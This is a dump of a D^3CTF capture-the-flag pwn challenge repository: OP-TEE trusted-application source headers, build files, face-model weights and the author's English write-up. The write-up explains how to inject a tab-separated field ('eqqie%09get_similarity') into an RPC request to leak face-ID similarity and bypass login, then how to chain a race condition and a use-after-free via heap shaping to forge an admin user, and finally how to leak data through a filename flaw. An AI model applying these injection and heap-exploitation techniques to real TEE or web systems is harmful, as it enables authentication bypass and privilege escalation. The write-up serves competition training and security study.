[{"weights":[{"name":"conv0/filters","shape":[3,3,3,16],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.009007044399485869,"min":-1.2069439495311063}},{"name":"conv0/bias","shape":[16],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.005263455241334205,"min":-0.9211046672334858}},{"name":"conv1/depthwise_filter","shape":[3,3,16,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.004001977630690033,"min":-0.5042491814669441}},{"name":"conv1/pointwise_filter","shape":[1,1,16,32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.013836609615999109,"min":-1.411334180831909}},{"name":"conv1/bias","shape":[32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0015159862590771096,"min":-0.30926119685173037}},{"name":"conv2/depthwise_filter","shape":[3,3,32,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.002666276225856706,"min":-0.317286870876948}},{"name":"conv2/pointwise_filter","shape":[1,1,32,64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.015265831292844286,"min":-1.6792414422128714}},{"name":"conv2/bias","shape":[64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0020280554598453,"min":-0.37113414915168985}},{"name":"conv3/depthwise_filter","shape":[3,3,64,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.006100742489683862,"min":-0.8907084034938438}},{"name":"conv3/pointwise_filter","shape":[1,1,64,128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.016276211832083907,"min":-2.0508026908425725}},{"name":"conv3/bias","shape":[128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.003394414279975143,"min":-0.7637432129944072}},{"name":"conv4/depthwise_filter","shape":[3,3,128,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.006716050119961009,"min":-0.8059260143953211}},{"name":"conv4/pointwise_filter","shape":[1,1,128,256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.021875603993733724,"min":-2.8875797271728514}},{"name":"conv4/bias","shape":[256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0041141652009066415,"min":-0.8187188749804216}},{"name":"conv5/depthwise_filter","shape":[3,3,256,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.008423839597141042,"min":-0.9013508368940915}},{"name":"conv5/pointwise_filter","shape":[1,1,256,512],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.030007277283014035,"min":-3.8709387695088107}},{"name":"conv5/bias","shape":[512],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.008402082966823203,"min":-1.4871686851277068}},{"name":"conv8/filters","shape":[1,1,512,25],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.028336129469030042,"min":-4.675461362389957}},{"name":"conv8/bias","shape":[25],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.002268134028303857,"min":-0.41053225912299807}}],"paths":["tiny_face_detector_model-shard1"]}] -------------------------------------------------------------------------------- /src/d3_trusted_core/ta/Android.mk: -------------------------------------------------------------------------------- 1 | LOCAL_PATH := $(call my-dir) 2 | 3 | local_module := ae13ed5a-4d7a-47b6-81f1-20cd2adfb340.ta 4 | include $(BUILD_OPTEE_MK) 5 | -------------------------------------------------------------------------------- /src/d3_trusted_core/ta/Makefile: -------------------------------------------------------------------------------- 1 | CFG_TEE_TA_LOG_LEVEL ?= 4 2 | CFG_TA_OPTEE_CORE_API_COMPAT_1_1=y 3 | 4 | # The UUID for the Trusted Application 5 | BINARY=ae13ed5a-4d7a-47b6-81f1-20cd2adfb340 6 | 7 | -include $(TA_DEV_KIT_DIR)/mk/ta_dev_kit.mk 8 | 9 | ifeq ($(wildcard $(TA_DEV_KIT_DIR)/mk/ta_dev_kit.mk), ) 10 | clean: 11 | @echo 'Note: $$(TA_DEV_KIT_DIR)/mk/ta_dev_kit.mk not found, cannot clean TA' 12 | @echo 'Note: TA_DEV_KIT_DIR=$(TA_DEV_KIT_DIR)' 13 | endif 14 | -------------------------------------------------------------------------------- /src/d3_trusted_core/ta/include/d3_trusted_core_ta.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2016-2017, Linaro Limited 3 | * All rights reserved. 4 | * 5 | * Redistribution and use in source and binary forms, with or without 6 | * modification, are permitted provided that the following conditions are met: 7 | * 8 | * 1. Redistributions of source code must retain the above copyright notice, 9 | * this list of conditions and the following disclaimer. 10 | * 11 | * 2. Redistributions in binary form must reproduce the above copyright notice, 12 | * this list of conditions and the following disclaimer in the documentation 13 | * and/or other materials provided with the distribution. 14 | * 15 | * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 16 | * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 17 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 18 | * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE 19 | * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 20 | * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF 21 | * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS 22 | * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN 23 | * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) 24 | * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 25 | * POSSIBILITY OF SUCH DAMAGE. 26 | */ 27 | #ifndef TA_D3_TRUSTED_CORE_H 28 | #define TA_D3_TRUSTED_CORE_H 29 | 30 | /* 31 | * This UUID is generated with uuidgen 32 | * the ITU-T UUID generator at http://www.itu.int/ITU-T/asn1/uuid.html 33 | */ 34 | // ae13ed5a-4d7a-47b6-81f1-20cd2adfb340 35 | #define TA_D3_TRUSTED_CORE_UUID \ 36 | { 0xae13ed5a, 0x4d7a, 0x47b6, \ 37 | { 0x81, 0xf1, 0x20, 0xcd, 0x2a, 0xdf, 0xb3, 0x40} } 38 | 39 | 40 | #define TA_D3_CMD_DEBUG_LOG 0x1000 41 | #define TA_D3_CMD_AUTH_USER_PASSWD 0x1001 42 | #define TA_D3_CMD_AUTH_USER_FACE_ID 0x1002 43 | #define TA_D3_CMD_AUTH_SESSION_ID 0x1003 44 | 45 | #define TA_D3_CMD_GET_USER_INFO 0x2000 46 | #define TA_D3_CMD_GET_USER_LIST 0x2001 47 | 48 | #define TA_D3_CMD_USER_PASSWD 0x2010 49 | #define TA_D3_CMD_USER_ENABLE 0x2011 50 | #define TA_D3_CMD_USER_DISABLE 0x2012 51 | #define TA_D3_CMD_USER_RESET 0x2013 52 | 53 | #define TA_D3_CMD_USER_LOGOUT 0x2020 54 | #define TA_D3_CMD_USER_KICKOUT 0x2021 55 | 56 | #define TA_D3_CMD_CREATE_SEC_FILE 0x3000 57 | #define TA_D3_CMD_DELETE_SEC_FILE 0x3001 58 | #define TA_D3_CMD_READ_SEC_FILE 0x3002 59 | #define TA_D3_CMD_UPDATE_SEC_FILE 0x3003 60 | #define TA_D3_CMD_RENAME_SEC_FILE 0x3004 61 | 62 | #define TA_D3_CMD_CREATE_SEC_DIR 0x3010 63 | #define TA_D3_CMD_DELETE_SEC_DIR 0x3011 64 | #define TA_D3_CMD_GET_SEC_FILE_INFO 0x3012 65 | #define TA_D3_CMD_GET_SEC_DIR_INFO 0x3013 66 | #define TA_D3_CMD_GET_SECFS_SLOTS_INFO 0x3020 67 | 68 | #define TA_D3_CMD_CHECK_ALIVE 0x4000 69 | #define TA_D3_CMD_CALC_SHA256 0x4001 70 | 71 | #define TEE_SHA256_HASH_SIZE 32u 72 | 73 | #define MAX_USERNAME_LEN 128 74 | #define MIN_PASSWORD_LEN 6 75 | #define MAX_PASSWORD_LEN 128 76 | #define PASSWORD_HASH_SIZE (TEE_SHA256_HASH_SIZE*2) 77 | #define MAX_SESSION_LEN 128 78 | #define HTTP_SESSION_LEN (TEE_SHA256_HASH_SIZE*2) 79 | enum { 80 | USER_TYPE_ADMIN, 81 | USER_TYPE_USER, 82 | USER_TYPE_GUEST, 83 | USER_TYPE_COUNT 84 | }; 85 | enum { 86 | ACTION_PERMISSON_PASSWD, 87 | ACTION_PERMISSON_ENABLE, 88 | ACTION_PERMISSON_DISABLE, 89 | ACTION_PERMISSON_KICOOUT, 90 | ACTION_PERMISSON_RESET, 91 | ACTION_PERMISSON_CREATE_FILE, 92 | ACTION_PERMISSON_DELETE_FILE, 93 | ACTION_PERMISSON_CREATE_DIR, 94 | ACTION_PERMISSON_DELETE_DIR, 95 | ACTION_PERMISSON_READ_FILE, 96 | ACTION_PERMISSON_WRITE_FILE, 97 | ACTION_PERMISSON_LIST_FILE, 98 | ACTION_COUNT 99 | }; 100 | static uint8_t admin_permission_table[USER_TYPE_COUNT][ACTION_COUNT]; 101 | static uint8_t user_permission_table[USER_TYPE_COUNT][ACTION_COUNT]; 102 | static uint8_t guest_permission_table[USER_TYPE_COUNT][ACTION_COUNT]; 103 | static const char *user_type_table[USER_TYPE_COUNT+1] = { 104 | "admin", 105 | "user", 106 | "guest", 107 | 0 108 | }; 109 | #define USER_MAGIC_NORMAL 0x72657375 110 | #define USER_MAGIC_DISABLED 0xffffffff 111 | typedef struct UserInfo user_info_t; 112 | struct UserInfo{ 113 | uint32_t magic; 114 | uint32_t uid; 115 | uint32_t type; 116 | uint32_t face_id; 117 | char username[MAX_USERNAME_LEN+8]; 118 | char password[MAX_PASSWORD_LEN+8]; 119 | uint32_t face_id_expired_round; 120 | double *face_data; 121 | user_info_t *next; 122 | }; 123 | typedef struct UserInfoOut user_info_out_t; 124 | struct UserInfoOut{ 125 | // public regions 126 | uint32_t magic; 127 | uint32_t uid; 128 | uint32_t type; 129 | uint32_t face_id; 130 | char username[MAX_USERNAME_LEN+8]; 131 | }; 132 | 133 | #define FILE_NODE_EMPTY 0x1 134 | #define FILE_NODE_DIR 0x2 135 | #define FILE_NODE_FILE 0x4 136 | #define FILE_NODE_DEL 0xff 137 | #define OBJ_ID_SIZE TEE_SHA256_HASH_SIZE*2 138 | 139 | typedef struct FileNode file_node_t; 140 | struct FileNode{ 141 | uint32_t node_type; 142 | uint32_t parent_id; 143 | uint32_t ext_id; 144 | uint32_t owner; 145 | uint32_t file_size; 146 | char obj_id[OBJ_ID_SIZE]; 147 | }; 148 | 149 | #define MAKE_FILE_NODE_FILE(node, _parent_id, _ext_id, _owner, _file_sz, _obj_id) ({ \ 150 | int _ret = 0; \ 151 | (node).node_type = FILE_NODE_FILE; \ 152 | (node).parent_id = _parent_id; \ 153 | (node).ext_id = _ext_id; \ 154 | (node).owner = _owner; \ 155 | (node).file_size = _file_sz; \ 156 | memcpy(node.obj_id, _obj_id, OBJ_ID_SIZE); \ 157 | _ret; \ 158 | }) 159 | #define MAKE_FILE_NODE_DIR(node, _parent_id, _ext_id, _owner, _obj_id) ({ \ 160 | int _ret = 0; \ 161 | (node).node_type = FILE_NODE_DIR; \ 162 | (node).parent_id = _parent_id; \ 163 | (node).ext_id = _ext_id; \ 164 | (node).owner = _owner; \ 165 | (node).file_size = 0; \ 166 | memcpy(node.obj_id, _obj_id, OBJ_ID_SIZE); \ 167 | _ret; \ 168 | }) 169 | 170 | #define MAKE_FILE_NODE_EMPTY(node) ({ \ 171 | int _ret = 0; \ 172 | memset(&(node), 0, sizeof(file_node_t)); \ 173 | (node).node_type = FILE_NODE_EMPTY; \ 174 | _ret; \ 175 | }) 176 | 177 | #define MAX_FILE_COUNT 128 178 | #define MAX_FILE_ID MAX_FILE_COUNT 179 | #define MAX_FILE_NAME 128 180 | #define MAX_DIR_NAME MAX_FILE_NAME 181 | #define MAX_FILE_DATA 4096 182 | #define SEC_FILE_STATUS_FILE 0xffff1000 183 | #define SEC_FILE_STATUS_DIR 0xffff1001 184 | #define SEC_FILE_STATUS_DEL 0xffffffff 185 | 186 | 187 | typedef struct SecFile sec_file_t; 188 | typedef sec_file_t sec_dir_t; 189 | #pragma pack(push, 4) 190 | struct SecFile{ 191 | uint32_t magic; 192 | char hash[TEE_SHA256_HASH_SIZE]; 193 | uint32_t name_size; 194 | uint32_t data_size; 195 | char filename[MAX_FILE_NAME]; 196 | uint32_t status; 197 | char data[0]; 198 | }; 199 | #pragma pack(pop) 200 | 201 | 202 | typedef struct FileInfo file_info_t; 203 | struct FileInfo{ 204 | uint32_t magic; 205 | uint32_t node_type; 206 | uint32_t parent_id; 207 | uint32_t ext_id; 208 | uint32_t owner; 209 | uint32_t file_size; 210 | char filename[MAX_FILE_NAME]; 211 | char hash[TEE_SHA256_HASH_SIZE*2]; 212 | }; 213 | 214 | typedef struct DirInfo dir_info_t; 215 | struct DirInfo{ 216 | uint32_t magic; 217 | uint32_t node_type; 218 | uint32_t parent_id; 219 | uint32_t ext_id; 220 | uint32_t owner; 221 | char dir_name[MAX_FILE_NAME]; 222 | uint8_t sub_items[MAX_FILE_COUNT]; 223 | }; 224 | 225 | #define MAKE_FILE_INFO_DETAIL_REF(file_info, file_node, _filename) ({ \ 226 | if(_file_info){ \ 227 | (_file_info)->node_type = (file_node)->node_type; \ 228 | (_file_info)->parent_id = (file_node)->parent_id; \ 229 | (_file_info)->ext_id = (file_node)->ext_id; \ 230 | (_file_info)->owner = (file_node)->owner; \ 231 | (_file_info)->file_size = (file_node)->file_size; \ 232 | strncpy((_file_info)->filename, _filename, MAX_FILE_NAME); \ 233 | } \ 234 | _file_info; \ 235 | }) 236 | 237 | #define SEC_FILE_MAGIC 0x73656366 238 | #define MAKE_SEC_FILE_REF(file, _filename, data, data_sz) ({ \ 239 | int _ret = 0; \ 240 | if(strlen(_filename) > MAX_FILE_NAME) \ 241 | _ret = 1; \ 242 | if(d3_core_sha256(data, data_sz, (file)->hash) != TEE_SHA256_HASH_SIZE) \ 243 | _ret = 1; \ 244 | (file)->magic = SEC_FILE_MAGIC; \ 245 | memset((file)->filename, 0, MAX_FILE_NAME); \ 246 | strncpy((file)->filename, _filename, MAX_FILE_NAME); \ 247 | (file)->status = SEC_FILE_STATUS_FILE; \ 248 | memcpy((file)->data, data, data_sz); \ 249 | (file)->name_size = strlen((file)->filename); \ 250 | (file)->data_size = data_sz; \ 251 | _ret; \ 252 | }) 253 | 254 | #define MAKE_SEC_DIR_REF(file, _dir_name) ({ \ 255 | int _ret = 0; \ 256 | if(strlen(_dir_name) > MAX_FILE_NAME) \ 257 | _ret = 1; \ 258 | memset((file)->hash, 0, TEE_SHA256_HASH_SIZE); \ 259 | (file)->magic = SEC_FILE_MAGIC; \ 260 | memset((file)->filename, 0, MAX_FILE_NAME); \ 261 | strncpy((file)->filename, _dir_name, MAX_FILE_NAME); \ 262 | (file)->name_size = strlen((file)->filename); \ 263 | (file)->data_size = 0; \ 264 | (file)->status = SEC_FILE_STATUS_DIR; \ 265 | _ret; \ 266 | }) 267 | 268 | 269 | #define MAKE_USER_INFO_OUT(user_info, user_info_out) { \ 270 | user_info_out.magic = user_info.magic; \ 271 | user_info_out.uid = user_info.uid; \ 272 | user_info_out.type = user_info.type; \ 273 | user_info_out.face_id = user_info.face_id; \ 274 | memcpy(user_info_out.username, user_info.username, MAX_USERNAME_LEN+8); \ 275 | } 276 | 277 | #define MAKE_USER_INFO_OUT_REF(user_info, user_info_out) { \ 278 | (user_info_out)->magic = (user_info)->magic; \ 279 | (user_info_out)->uid = (user_info)->uid; \ 280 | (user_info_out)->type = (user_info)->type; \ 281 | (user_info_out)->face_id = (user_info)->face_id; \ 282 | memcpy((user_info_out)->username, (user_info)->username, MAX_USERNAME_LEN+8); \ 283 | } 284 | 285 | typedef struct Session session_t; 286 | struct Session{ 287 | uint32_t uid; 288 | user_info_t *user_info; 289 | char session_id[MAX_SESSION_LEN+8]; 290 | session_t *next; 291 | }; 292 | 293 | 294 | // all functions's declaration 295 | typedef double vec_float; 296 | vec_float sqrt(vec_float x); 297 | vec_float d3_core_euclidean_distance(const vec_float *x, const vec_float *y, uint32_t size); 298 | uint32_t d3_core_sha256(uint8_t * data, uint32_t data_len, uint8_t* hash); 299 | uint32_t d3_core_hexlify(uint8_t *data, uint32_t data_len, uint8_t *hex_str, uint32_t hex_str_len); 300 | uint32_t d3_core_unhexlify(uint8_t *hex_str, uint32_t hex_str_len, uint8_t *data, uint32_t data_len); 301 | uint32_t d3_core_sha256_and_hexlify(uint8_t * data, uint32_t data_len, uint8_t* hash_hexlify, uint32_t hash_hexlify_len); 302 | uint32_t d3_core_add_user_info(user_info_t **entry, uint32_t magic, uint32_t user_id, uint32_t user_type, const char * username, const char * password); 303 | void d3_core_log_user_obj(user_info_t *entry); 304 | uint32_t d3_core_remove_user_info(user_info_t **entry, const char * username); 305 | session_t *d3_core_get_session(session_t *entry, const char *session_id); 306 | session_t *d3_core_get_alive_session_by_uid(session_t *entry, uint32_t uid); 307 | session_t *d3_core_get_alive_session_by_name(session_t *entry, const char *username); 308 | uint32_t d3_core_check_valid_session(session_t *entry, const char *session_id, session_t **target); 309 | uint32_t d3_core_get_user_info_from_session(session_t *entry, char *session_id, user_info_t **user_info); 310 | uint32_t d3_core_get_user_list(user_info_t *entry, uint32_t *count, user_info_out_t **res); 311 | uint32_t d3_core_enable_user_face_id(user_info_t *entry, const char *username, const vec_float *face_data, uint32_t do_alloc); 312 | uint32_t d3_core_disable_user_face_id(user_info_t *entry, const char *username); 313 | uint32_t d3_core_check_user_passwd(user_info_t *entry, const char *username, const char *password); 314 | uint32_t d3_core_check_user_action_perm(user_info_t *user, user_info_t *op_user, uint32_t action); 315 | uint32_t d3_core_check_user_face(user_info_t *entry, const char *username, const double *face_data, vec_float *similarity); 316 | user_info_t *d3_core_get_user_by_name(user_info_t *entry, const char *username); 317 | user_info_t *d3_core_move_user_by_name(user_info_t **entry_from, user_info_t **entry_to, const char *username); 318 | uint32_t d3_core_add_new_session(session_t **entry, user_info_t *user, const char *session_id); 319 | uint32_t d3_core_delete_session(session_t **entry, const char *session_id); 320 | uint32_t d3_core_kickout_user(session_t **entry, user_info_t *user); 321 | 322 | uint32_t d3_core_gen_random_obj_id(char *buf, uint32_t buf_size); 323 | uint32_t d3_core_create_secure_file(const char *filename, uint32_t parent_id, uint32_t owner, const uint8_t *data, uint32_t data_sz, uint32_t *ext_id_out); 324 | uint32_t d3_core_create_secure_dir(const char *dir_name, uint32_t parent_id, uint32_t owner, uint32_t *ext_id_out); 325 | uint32_t d3_core_delete_secure_file(uint32_t ext_id, uint32_t erase); 326 | uint32_t d3_core_delete_secure_dir(uint32_t ext_id, uint32_t recursive); 327 | uint32_t d3_core_get_sec_file_info(uint32_t ext_id, file_info_t *file_info); 328 | uint32_t d3_core_read_sec_file(uint32_t ext_id, char *file_data, uint32_t max_sz, uint32_t *data_sz); 329 | 330 | 331 | #endif /*TA_D3_TRUSTED_CORE_H*/ 332 | -------------------------------------------------------------------------------- /src/d3_trusted_core/ta/sub.mk: -------------------------------------------------------------------------------- 1 | global-incdirs-y += include 2 | srcs-y += d3_trusted_core.c 3 | 4 | # To remove a certain compiler flag, add a line like this 5 | #cflags-template_ta.c-y += -Wno-strict-prototypes 6 | -------------------------------------------------------------------------------- /src/d3_trusted_core/ta/user_ta_header_defines.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2016-2017, Linaro Limited 3 | * All rights reserved. 4 | * 5 | * Redistribution and use in source and binary forms, with or without 6 | * modification, are permitted provided that the following conditions are met: 7 | * 8 | * 1. Redistributions of source code must retain the above copyright notice, 9 | * this list of conditions and the following disclaimer. 10 | * 11 | * 2. Redistributions in binary form must reproduce the above copyright notice, 12 | * this list of conditions and the following disclaimer in the documentation 13 | * and/or other materials provided with the distribution. 14 | * 15 | * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 16 | * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 17 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 18 | * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE 19 | * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 20 | * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF 21 | * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS 22 | * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN 23 | * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) 24 | * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 25 | * POSSIBILITY OF SUCH DAMAGE. 26 | */ 27 | 28 | /* 29 | * The name of this file must not be modified 30 | */ 31 | 32 | #ifndef USER_TA_HEADER_DEFINES_H 33 | #define USER_TA_HEADER_DEFINES_H 34 | 35 | /* To get the TA UUID definition */ 36 | #include 37 | 38 | #define TA_UUID TA_D3_TRUSTED_CORE_UUID 39 | 40 | /* 41 | * TA properties: multi-instance TA, no specific attribute 42 | * TA_FLAG_EXEC_DDR is meaningless but mandated. 43 | */ 44 | #define TA_FLAGS TA_FLAG_EXEC_DDR 45 | 46 | /* Provisioned stack size */ 47 | #define TA_STACK_SIZE (2 * 1024) 48 | 49 | /* Provisioned heap size for TEE_Malloc() and friends */ 50 | #define TA_DATA_SIZE (32 * 1024) 51 | 52 | /* The gpd.ta.version property */ 53 | #define TA_VERSION "1.0" 54 | 55 | /* The gpd.ta.description property */ 56 | #define TA_DESCRIPTION "D3^CTF Trusted Execution Environment (TEE) Core Module." 57 | 58 | /* Extra properties */ 59 | #define TA_CURRENT_TA_EXT_PROPERTIES \ 60 | { "org.linaro.optee.examples.d3_trusted_core.property1", \ 61 | USER_TA_PROP_TYPE_STRING, \ 62 | "Eqqie" }, \ 63 | { "org.linaro.optee.examples.d3_trusted_core.property2", \ 64 | USER_TA_PROP_TYPE_U32, &(const uint32_t){ 0x0010 } } 65 | 66 | #endif /* USER_TA_HEADER_DEFINES_H */ 67 | -------------------------------------------------------------------------------- /writeup en-US.md: -------------------------------------------------------------------------------- 1 | ## d3TrustedHTTPd 2 | 3 | > Github Repo:[d3ctf-2022-pwn-d3TrustedHTTPd](https://github.com/yikesoftware/d3ctf-2022-pwn-d3TrustedHTTPd) 4 | 5 | > Author:Eqqie @ D^3CTF 6 | 7 | ### Analysis 8 | 9 | This is a challenge about ARM TEE vulnerability exploitation, I wrote an HTTPd as well as an RPC middleware on top of the regular TEE Pwn. The TA provides authentication services for HTTPd and a simple file system based on OP-TEE secure storage. HTTPd is written based on mini_httpd and the RPC middleware is located in `/usr/bin/optee_d3_trusted_core`, and they are related as follows. 10 | 11 | ![1](https://s2.loli.net/2023/05/03/pMyUuEAeDsN6lm4.png) 12 | 13 | To read the log in secure world (TEE) you can add this line to the QEMU args at `run.sh`. 14 | 15 | ```shell 16 | -serial tcp:localhost:54320 -serial tcp:localhost:54321 \ 17 | ``` 18 | 19 | This challenge contains a lot of code and memory corruption based on logic vulnerabilities, so it takes a lot of time to reverse the program. In order to quickly identify the OP-TEE API in TA I recommend you to use [BinaryAI](https://www.binaryai.cn/) online tool to analyze TA binaries, it can greatly reduce unnecessary workload. 20 | 21 | ![f5da5a5cb1efe21d620a0a63feda4ff](https://s2.loli.net/2023/05/03/sivkw9IR5JoEcUu.png) 22 | 23 | ### Step 1 24 | 25 | The first vulnerability appears in the RPC implementation between HTTPd and `optee_d3_trusted_core`. HTTPd only replaces spaces with null when getting the username parameter and splices the username into the end of the string used for RPC. 26 | 27 | ![image-20230502220946251](https://s2.loli.net/2023/05/03/bhKWtqHs89E2jUR.png) 28 | 29 | ![image-20230502221009171](https://s2.loli.net/2023/05/03/dnCHmKecbaWzBfN.png) 30 | 31 | `optee_d3_trusted_core` considers that different fields can be separated by spaces or `\t` (%09) when parsing RPC data, so we can inject additional fields into the RPC request via `\t`. 32 | 33 | ![image-20230502221340781](https://s2.loli.net/2023/05/03/hie4yxg18blR3HP.png) 34 | 35 | When an attacker requests to log in to an `eqqie` user using face_id, the similarity between the real face_id vector and the face_id vector sent by the attacker expressed as the inverse of the Euclidean distance can be leaked by injecting `eqqie%09get_similarity`. 36 | 37 | The attacker can traverse each dimension of the face_id vector in a certain step value (such as 0.015) and request the similarity of the current vector from the server to find the value that maximizes the similarity of each dimension. When all 128 dimensions in the vector have completed this calculation, the vector with the highest overall similarity will be obtained, and when the similarity exceeds the threshold of 85% in the TA, the Face ID authentication can be passed, bypassing the login restriction. 38 | 39 | ### Step 2 40 | 41 | In the second step we complete user privilege elevation by combining a TOCTOU race condition vulnerability and a UAF vulnerability in TA to obtain Admin user privileges. 42 | 43 | When we use the `/api/man/user/disable` API to disable a user, HTTPd completes this behavior in two steps, the first step is to kick out the corresponding user using `command user kickout` and then add the user to the disable list using `command user disable`. 44 | 45 | ![image-20230502223311793](https://s2.loli.net/2023/05/03/mqhalPFJbIgT7jd.png) 46 | 47 | TEE is atomic when calling `TEEC_InvokeCommand` in the same session, that is, only when the current Invoke execution is finished the next Invoke can start to execute, so there is no competition within an Invoke. But here, `TEEC_InvokeCommand` is called twice when implementing kickout, so there is a chance of race condition. 48 | 49 | **Kickout** function is implemented by searching the session list for the session object whose record UID is the same as the UID of the user to be deleted, and releasing it. 50 | 51 | ![image-20230502223709668](https://s2.loli.net/2023/05/03/upUwTymjv56X3Hd.png) 52 | 53 | **Disable** function is implemented by moving the user specified by username from the enable user list to the disable user list. 54 | 55 | ![image-20230502224103696](https://s2.loli.net/2023/05/03/vQrm5nM7NJzChKa.png) 56 | 57 | We can use a race condition idea where we first login to the guest user once to make it have a session, and then use two threads to **disable the guest user** and **log in to the guest user** in parallel. There is a certain probability that when the `/api/man/user/disable` interface kicks out the guest user, the attacker gives a new session to the guest user via the `/api/login` interface, and the `/api/man/user/disable` interface moves the guest user into the disabled list. After completing this attack, the attacker holds a session that refers to the disabled user. 58 | 59 | Based on this prerequisite we can exploit the existence of a UAF vulnerability in TA when resetting users. (I use the source code to show the location of the vulnerability more clearly) 60 | 61 | ![image-20230502225611570](https://s2.loli.net/2023/05/03/b72Yx1jKCTJHtFe.png) 62 | 63 | When you reset a user, if the user is already disabled, you will enter the logic as shown in the figure. The user's object is first removed from the user list, and if the `set_face_id` parameter is specified at reset time, a memory area is requested to hold the new face_id vector. The TA then recreates a user using `d3_core_add_user_info`. Finally, the TA iterates through all sessions and compares the uid to update the pointer to the user object referenced by the session. But instead of using `session->uid` when comparing UIDs, `session->user_info->uid` is used incorrectly. The object referenced by `session->user_info` has been freed earlier, so a freed chunk of memory is referenced here. If we can occupy this chunk by heap fengshui, we can bypass the updating of the user object reference on this session by modifying the UID hold by `user_info` object and then make the session refer to a fake user object forged by attacker. Naturally, the attacker can make the fake user as an Admin user. 64 | 65 | To complete the attack on this UAF, you can first read this [BGET Explained (phi1010.github.io)](https://phi1010.github.io/2020-09-14-bget-exploitation/) article to understand how the OP-TEE heap allocator works. The OP-TEE heap allocator is roughly similar to the unsorted bin in Glibc, except that the bin starts with a large freed chunk, which is split from the tail of the larger chunk when allocating through the bin. When releasing the chunk, it tries to merge the freed chunk before and after and insert it into the bin via a FIFO strategy. In order to exploit this vulnerability, we need to call the reset function after we adjust the heap layout from A to B, and then we can use the `delete->create->create` gadget in reset function. It will make the heap layout change in the way of C->D->E. In the end we can forge a Admin user by controlling the new face data. 66 | 67 | ![image-20230502232518449](https://s2.loli.net/2023/05/03/p8WsyVN4JtRfq5K.png) 68 | 69 | ### Step 3 70 | 71 | When we can get Admin privileges, we can fully use the secure file system implemented in TA based on OP-TEE secure storage (only read-only privileges for normal users). 72 | 73 | The secure file system has two modes of **erase** and **mark** when deleting files or directories. The erase mode will delete the entire file object from the OP-TEE secure storage, while the mark mode is marked as deleted in the file node, and the node will not be reused until there is no free slot. 74 | 75 | The secure file system uses the `SecFile` data structure when storing files and directories. When creating a directory, the status is set to `0xffff1001` (for a file, this value is `0xffff0000`). There are two options for deleting a directory, **recursive** and **non-recursive**. When deleting a directory in recursive mode, the data in the secure storage will not be erased, but marked as deleted. 76 | 77 | ```c 78 | typedef struct SecFile sec_file_t; 79 | typedef sec_file_t sec_dir_t; 80 | #pragma pack(push, 4) 81 | struct SecFile{ 82 | uint32_t magic; 83 | char hash[TEE_SHA256_HASH_SIZE]; 84 | uint32_t name_size; 85 | uint32_t data_size; 86 | char filename[MAX_FILE_NAME]; 87 | uint32_t status; 88 | char data[0]; 89 | }; 90 | #pragma pack(pop) 91 | ``` 92 | 93 | There is a small bug when creating files with `d3_core_create_secure_file` that the `status` field is not rewritten when reusing a slot that is marked as deleted (compared to `d3_core_create_secure_dir` which does not have this flaw). This does not directly affect much. 94 | 95 | ![image-20230503003858564](https://s2.loli.net/2023/05/03/faoiIJ67QUPg95X.png) 96 | 97 | ![image-20230503003654968](https://s2.loli.net/2023/05/03/8pXANtxW1OoQLPd.png) 98 | 99 | But there is another flaw when renaming files, that is, it is allowed to set a file name with a length of 128 bytes. Since the maximum length of the file name field is 128, this flaw will cause the filename to loss the null byte at the end. This vulnerability combined with the flaw of rewriting of the `status` field will include the length of the file name itself and the length of the file content when updating the length of the file name. This causes the file name and content of the file to be brought together when using `d3_core_get_sec_file_info` to read file information. 100 | 101 | ![7ac17a0ea058ffb702e9754be596f8d](https://s2.loli.net/2023/05/03/SZwUrxIDz9n7Kji.png) 102 | 